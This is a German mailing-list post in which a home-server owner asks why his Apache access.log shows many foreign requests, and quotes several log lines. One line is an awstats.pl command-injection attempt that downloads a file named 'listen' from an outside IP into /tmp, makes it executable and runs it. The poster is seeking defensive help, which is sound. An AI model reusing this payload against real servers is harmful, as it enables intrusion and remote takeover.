Apache access.log
Moin alle zusammen,
ich bitte mal wieder um Rat. Nachdem mein Webserver nun läuft, dank
eurer Hilfe wg. ddclient, habe ich in der access.log jede Menge Einträge
die ich nicht verstehe. Erst mal weiß ich gar nicht wieso ich so viele
(Hunderte täglich) Zugriffe habe, denn die DynDNS-Domain ist nur 4
Personen bekannt.
Laut Whois habe ich aber Zugriffe aus Deutschland, China, Japan,
Italien, Spanien, Frankreich und weiteren Ländern. Sind dort Hacker beim
ausprobieren oder was passiert da?
Wenn ich die Einträge richtig deute, wird häufig versucht auf Dateien
und Verzeichnisse zuzugreifen, die jedoch gar nicht existieren.
Beispiele:
82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
82.83.223.39 - - [15/Nov/2005:09:23:05 +0100] "OPTIONS / HTTP/1.1" 200
1304 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
82.251.49.61 - - [15/Nov/2005:12:19:01 +0100] "GET / HTTP/1.0" 200 1292
"-" "-"
82.253.228.245 - - [15/Nov/2005:12:31:17 +0100] "OPTIONS / HTTP/1.1" 200
1304 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr
begrenzten Personenkreis zugänglich sind. Versucht im ersten Beispiel
evtl. jemand Rechte zu verändern?
Kann mir vielleicht jemand erklären was da passiert?
Vielen Dank und noch ein schönes Restwochenende.
Gruß - Harald
Reply to: